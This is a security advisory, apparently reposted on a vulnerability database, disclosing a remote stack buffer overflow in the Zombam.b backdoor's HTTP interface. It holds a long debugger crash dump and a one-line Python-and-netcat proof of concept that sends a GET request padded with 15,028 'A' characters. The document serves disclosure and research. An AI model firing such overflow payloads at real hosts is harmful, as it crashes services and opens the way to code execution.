Vulners
Lucene search
Backdoor.Win32.Zombam.b Buffer Overflow
🗓️ 17 Feb 2022 00:00:00Reported by malvuln, malvuln.comType 
packetstorm🔗 packetstormsecurity.com👁 272 Views
`Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee.txt
Contact: [email protected]
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Zombam.b
Vulnerability: Remote Stack Buffer Overflow
Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the EBP and EIP registers by sending a specially crafted HTTP request.
Type: PE32
MD5: 1e3665a67201209609ae493a2a590bee
Vuln ID: MVID-2022-0487
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 02/16/2022
Memory Dump:
(148c.dd4): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=9d082a1a edx=00000000 esi=00000003 edi=00000003
eip=7770ed3c esp=0538f194 ebp=0538f324 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400 ret 14h
0:006> .ecxr
eax=00000000 ebx=040202b0 ecx=9d082a1a edx=00000000 esi=0538fb51 edi=04020330
eip=41414141 esp=0538fab4 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
41414141 ?? ???
0:006> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe
FAULTING_IP:
+3485
41414141 ?? ???
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414141
Attempt to read from address 41414141
PROCESS_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 41414141
READ_ADDRESS: 41414141
FOLLOWUP_IP:
Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485
00403485 50 push eax
FAILED_INSTRUCTION_ADDRESS:
+3485
41414141 ?? ???
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 00000dd4
BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141
IP_ON_HEAP: 41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 41414141
FRAME_ONE_INVALID: 1
LAST_CONTROL_TRANSFER: from 41414141 to 41414141
STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
0538fab0 41414141 41414141 41414141 41414141 0x41414141
0538fab4 41414141 41414141 41414141 41414141 0x41414141
0538fab8 41414141 41414141 41414141 41414141 0x41414141
0538fabc 41414141 41414141 41414141 41414141 0x41414141
0538fac0 41414141 41414141 41414141 41414141 0x41414141
0538fac4 41414141 41414141 41414141 41414141 0x41414141
0538fac8 41414141 41414141 41414141 41414141 0x41414141
0538facc 41414141 41414141 41414141 41414141 0x41414141
0538fad0 41414141 41414141 41414141 41414141 0x41414141
0538fad4 41414141 41414141 41414141 41414141 0x41414141
0538fad8 41414141 41414141 41414141 41414141 0x41414141
0538fadc 41414141 41414141 41414141 41414141 0x41414141
0538fae0 41414141 41414141 41414141 41414141 0x41414141
0538fae4 41414141 41414141 41414141 41414141 0x41414141
0538fae8 41414141 41414141 41414141 41414141 0x41414141
0538faec 41414141 41414141 41414141 41414141 0x41414141
0538faf0 41414141 41414141 41414141 41414141 0x41414141
0538faf4 41414141 41414141 41414141 41414141 0x41414141
0538faf8 41414141 41414141 41414141 41414141 0x41414141
0538fafc 41414141 41414141 41414141 41414141 0x41414141
0538fb00 41414141 41414141 41414141 41414141 0x41414141
0538fb04 41414141 41414141 41414141 41414141 0x41414141
0538fb08 41414141 41414141 41414141 41414141 0x41414141
0538fb0c 41414141 41414141 41414141 41414141 0x41414141
0538fb10 41414141 41414141 41414141 41414141 0x41414141
0538fb14 41414141 41414141 41414141 41414141 0x41414141
0538fb18 41414141 41414141 41414141 41414141 0x41414141
0538fb1c 41414141 41414141 41414141 41414141 0x41414141
0538fb20 41414141 41414141 41414141 41414141 0x41414141
0538fb24 41414141 41414141 41414141 41414141 0x41414141
0538fb28 41414141 41414141 41414141 41414141 0x41414141
0538fb2c 41414141 41414141 41414141 41414141 0x41414141
0538fb30 41414141 41414141 41414141 41414141 0x41414141
0538fb34 41414141 41414141 41414141 41414141 0x41414141
0538fb38 41414141 41414141 41414141 41414141 0x41414141
0538fb3c 41414141 41414141 41414141 41414141 0x41414141
0538fb40 41414141 41414141 41414141 41414141 0x41414141
0538fb44 41414141 41414141 41414141 41414141 0x41414141
0538fb48 41414141 41414141 41414141 41414141 0x41414141
0538fb4c 41414141 41414141 41414141 41414141 0x41414141
0538fb50 41414141 41414141 41414141 41414141 0x41414141
0538fb54 41414141 41414141 41414141 41414141 0x41414141
0538fb58 41414141 41414141 41414141 41414141 0x41414141
0538fb5c 41414141 41414141 41414141 41414141 0x41414141
0538fb60 41414141 41414141 41414141 41414141 0x41414141
0538fb64 41414141 41414141 41414141 41414141 0x41414141
0538fb68 41414141 41414141 41414141 41414141 0x41414141
0538fb6c 41414141 41414141 41414141 41414141 0x41414141
0538fb70 41414141 41414141 41414141 41414141 0x41414141
0538fb74 41414141 41414141 41414141 41414141 0x41414141
0538fb78 41414141 41414141 41414141 41414141 0x41414141
0538fb7c 41414141 41414141 41414141 41414141 0x41414141
0538fb80 41414141 41414141 41414141 41414141 0x41414141
0538fb84 41414141 41414141 41414141 41414141 0x41414141
0538fb88 41414141 41414141 41414141 41414141 0x41414141
0538fb8c 41414141 41414141 41414141 41414141 0x41414141
0538fb90 41414141 41414141 41414141 41414141 0x41414141
0538fb94 41414141 41414141 41414141 41414141 0x41414141
0538fb98 41414141 41414141 41414141 41414141 0x41414141
0538fb9c 41414141 41414141 41414141 41414141 0x41414141
0538fba0 41414141 41414141 41414141 41414141 0x41414141
0538fba4 41414141 41414141 41414141 41414141 0x41414141
0538fba8 41414141 41414141 41414141 41414141 0x41414141
0538fbac 41414141 41414141 41414141 41414141 0x41414141
0538fbb0 41414141 41414141 41414141 41414141 0x41414141
0538fbb4 41414141 41414141 41414141 41414141 0x41414141
0538fbb8 41414141 41414141 41414141 41414141 0x41414141
0538fbbc 41414141 41414141 41414141 41414141 0x41414141
0538fbc0 41414141 41414141 41414141 41414141 0x41414141
0538fbc4 41414141 41414141 41414141 41414141 0x41414141
0538fbc8 41414141 41414141 41414141 41414141 0x41414141
0538fbcc 41414141 41414141 41414141 41414141 0x41414141
0538fbd0 41414141 41414141 41414141 41414141 0x41414141
0538fbd4 41414141 41414141 41414141 41414141 0x41414141
0538fbd8 41414141 41414141 41414141 41414141 0x41414141
0538fbdc 41414141 41414141 41414141 41414141 0x41414141
0538fbe0 41414141 41414141 41414141 41414141 0x41414141
0538fbe4 41414141 41414141 41414141 41414141 0x41414141
0538fbe8 41414141 41414141 41414141 41414141 0x41414141
0538fbec 41414141 41414141 41414141 41414141 0x41414141
0538fbf0 41414141 41414141 41414141 41414141 0x41414141
0538fbf4 41414141 41414141 41414141 41414141 0x41414141
0538fbf8 41414141 41414141 41414141 41414141 0x41414141
0538fbfc 41414141 41414141 41414141 41414141 0x41414141
0538fc00 41414141 41414141 41414141 41414141 0x41414141
0538fc04 41414141 41414141 41414141 41414141 0x41414141
0538fc08 41414141 41414141 41414141 41414141 0x41414141
0538fc0c 41414141 41414141 41414141 41414141 0x41414141
0538fc10 41414141 41414141 41414141 41414141 0x41414141
0538fc14 41414141 41414141 41414141 41414141 0x41414141
0538fc18 41414141 41414141 41414141 41414141 0x41414141
0538fc1c 41414141 41414141 41414141 41414141 0x41414141
0538fc20 41414141 41414141 41414141 41414141 0x41414141
0538fc24 41414141 41414141 41414141 41414141 0x41414141
0538fc28 41414141 41414141 41414141 41414141 0x41414141
0538fc2c 41414141 41414141 41414141 41414141 0x41414141
0538fc30 41414141 41414141 41414141 41414141 0x41414141
0538fc34 41414141 41414141 41414141 41414141 0x41414141
0538fc38 41414141 41414141 41414141 41414141 0x41414141
0538fc3c 41414141 41414141 41414141 41414141 0x41414141
0538fc40 41414141 41414141 41414141 41414141 0x41414141
0538fc44 41414141 41414141 41414141 41414141 0x41414141
0538fc48 41414141 41414141 41414141 41414141 0x41414141
0538fc4c 41414141 41414141 41414141 41414141 0x41414141
0538fc50 41414141 41414141 41414141 41414141 0x41414141
0538fc54 41414141 41414141 41414141 41414141 0x41414141
0538fc58 41414141 41414141 41414141 41414141 0x41414141
0538fc5c 41414141 41414141 41414141 41414141 0x41414141
0538fc60 41414141 41414141 41414141 41414141 0x41414141
0538fc64 41414141 41414141 41414141 41414141 0x41414141
0538fc68 41414141 41414141 41414141 41414141 0x41414141
0538fc6c 41414141 41414141 41414141 41414141 0x41414141
0538fc70 41414141 41414141 41414141 41414141 0x41414141
0538fc74 41414141 41414141 41414141 41414141 0x41414141
0538fc78 41414141 41414141 41414141 41414141 0x41414141
0538fc7c 41414141 41414141 41414141 41414141 0x41414141
0538fc80 41414141 41414141 41414141 41414141 0x41414141
0538fc84 41414141 41414141 41414141 41414141 0x41414141
0538fc88 41414141 41414141 41414141 41414141 0x41414141
0538fc8c 41414141 41414141 41414141 41414141 0x41414141
0538fc90 41414141 41414141 41414141 41414141 0x41414141
0538fc94 41414141 41414141 41414141 41414141 0x41414141
0538fc98 41414141 41414141 41414141 41414141 0x41414141
0538fc9c 41414141 41414141 41414141 41414141 0x41414141
0538fca0 41414141 41414141 41414141 41414141 0x41414141
0538fca4 41414141 41414141 41414141 41414141 0x41414141
0538fca8 41414141 41414141 41414141 41414141 0x41414141
0538fcac 41414141 41414141 41414141 41414141 0x41414141
0538fcb0 41414141 41414141 41414141 41414141 0x41414141
0538fcb4 41414141 41414141 41414141 41414141 0x41414141
0538fcb8 41414141 41414141 41414141 41414141 0x41414141
0538fcbc 41414141 41414141 41414141 41414141 0x41414141
0538fcc0 41414141 41414141 41414141 41414141 0x41414141
0538fcc4 41414141 41414141 41414141 41414141 0x41414141
0538fcc8 41414141 41414141 41414141 41414141 0x41414141
0538fccc 41414141 41414141 41414141 41414141 0x41414141
0538fcd0 41414141 41414141 41414141 41414141 0x41414141
0538fcd4 41414141 41414141 41414141 41414141 0x41414141
0538fcd8 41414141 41414141 41414141 41414141 0x41414141
0538fcdc 41414141 41414141 41414141 41414141 0x41414141
0538fce0 41414141 41414141 41414141 41414141 0x41414141
0538fce4 41414141 41414141 41414141 41414141 0x41414141
0538fce8 41414141 41414141 41414141 41414141 0x41414141
0538fcec 41414141 41414141 41414141 41414141 0x41414141
0538fcf0 41414141 41414141 41414141 41414141 0x41414141
0538fcf4 41414141 41414141 41414141 41414141 0x41414141
0538fcf8 41414141 41414141 41414141 41414141 0x41414141
0538fcfc 41414141 41414141 41414141 41414141 0x41414141
0538fd00 41414141 41414141 41414141 41414141 0x41414141
0538fd04 41414141 41414141 41414141 41414141 0x41414141
0538fd08 41414141 41414141 41414141 41414141 0x41414141
0538fd0c 41414141 41414141 41414141 41414141 0x41414141
0538fd10 41414141 41414141 41414141 41414141 0x41414141
0538fd14 41414141 41414141 41414141 41414141 0x41414141
0538fd18 41414141 41414141 41414141 41414141 0x41414141
0538fd1c 41414141 41414141 41414141 41414141 0x41414141
0538fd20 41414141 41414141 41414141 41414141 0x41414141
0538fd24 41414141 41414141 41414141 41414141 0x41414141
0538fd28 41414141 41414141 41414141 41414141 0x41414141
0538fd2c 41414141 41414141 41414141 41414141 0x41414141
0538fd30 41414141 41414141 41414141 41414141 0x41414141
0538fd34 41414141 41414141 41414141 41414141 0x41414141
0538fd38 41414141 41414141 41414141 41414141 0x41414141
0538fd3c 41414141 41414141 41414141 41414141 0x41414141
0538fd40 41414141 41414141 41414141 41414141 0x41414141
0538fd44 41414141 41414141 41414141 41414141 0x41414141
0538fd48 41414141 41414141 41414141 41414141 0x41414141
0538fd4c 41414141 41414141 41414141 41414141 0x41414141
0538fd50 41414141 41414141 41414141 41414141 0x41414141
0538fd54 41414141 41414141 41414141 41414141 0x41414141
0538fd58 41414141 41414141 41414141 41414141 0x41414141
0538fd5c 41414141 41414141 41414141 41414141 0x41414141
0538fd60 41414141 41414141 41414141 41414141 0x41414141
0538fd64 41414141 41414141 41414141 41414141 0x41414141
0538fd68 41414141 41414141 41414141 41414141 0x41414141
0538fd6c 41414141 41414141 41414141 41414141 0x41414141
0538fd70 41414141 41414141 41414141 41414141 0x41414141
0538fd74 41414141 41414141 41414141 41414141 0x41414141
0538fd78 41414141 41414141 41414141 41414141 0x41414141
0538fd7c 41414141 41414141 41414141 41414141 0x41414141
0538fd80 41414141 41414141 41414141 41414141 0x41414141
0538fd84 41414141 41414141 41414141 41414141 0x41414141
0538fd88 41414141 41414141 41414141 41414141 0x41414141
0538fd8c 41414141 41414141 41414141 41414141 0x41414141
0538fd90 41414141 41414141 41414141 41414141 0x41414141
0538fd94 41414141 41414141 41414141 41414141 0x41414141
0538fd98 41414141 41414141 41414141 41414141 0x41414141
0538fd9c 41414141 41414141 41414141 41414141 0x41414141
0538fda0 41414141 41414141 41414141 41414141 0x41414141
0538fda4 41414141 41414141 41414141 41414141 0x41414141
0538fda8 41414141 41414141 41414141 41414141 0x41414141
0538fdac 41414141 41414141 41414141 41414141 0x41414141
0538fdb0 41414141 41414141 41414141 41414141 0x41414141
0538fdb4 41414141 41414141 41414141 41414141 0x41414141
0538fdb8 41414141 41414141 41414141 41414141 0x41414141
0538fdbc 41414141 41414141 41414141 41414141 0x41414141
0538fdc0 41414141 41414141 41414141 41414141 0x41414141
0538fdc4 41414141 41414141 41414141 41414141 0x41414141
0538fdc8 41414141 41414141 41414141 41414141 0x41414141
0538fdcc 41414141 41414141 41414141 41414141 0x41414141
0538fdd0 41414141 41414141 41414141 41414141 0x41414141
0538fdd4 41414141 41414141 41414141 41414141 0x41414141
0538fdd8 41414141 41414141 41414141 41414141 0x41414141
0538fddc 41414141 41414141 41414141 41414141 0x41414141
0538fde0 41414141 41414141 41414141 41414141 0x41414141
0538fde4 41414141 41414141 41414141 41414141 0x41414141
0538fde8 41414141 41414141 41414141 41414141 0x41414141
0538fdec 41414141 41414141 41414141 41414141 0x41414141
0538fdf0 41414141 41414141 41414141 41414141 0x41414141
0538fdf4 41414141 41414141 41414141 41414141 0x41414141
0538fdf8 41414141 41414141 41414141 41414141 0x41414141
0538fdfc 41414141 41414141 41414141 41414141 0x41414141
0538fe00 41414141 41414141 41414141 41414141 0x41414141
0538fe04 41414141 41414141 41414141 41414141 0x41414141
0538fe08 41414141 41414141 41414141 41414141 0x41414141
0538fe0c 41414141 41414141 41414141 41414141 0x41414141
0538fe10 41414141 41414141 41414141 41414141 0x41414141
0538fe14 41414141 41414141 41414141 41414141 0x41414
STACK_COMMAND: ~6s; .ecxr ; kb
SYMBOL_STACK_INDEX: e9
SYMBOL_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee
IMAGE_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 3e780ebf
FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485
Exploit/PoC:
python -c "print('GET /'+'A'*15028 +' HTTP/1.0\r\nHost: 192.168.18.125\r\n\r\n')" | nc64.exe 192.168.18.125 80 -v
125.18.168.192.in-addr.arpa [192.168.18.125] 80 (http) open
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Feb 2022 00:00Current
0.9Low risk
Vulners AI Score0.9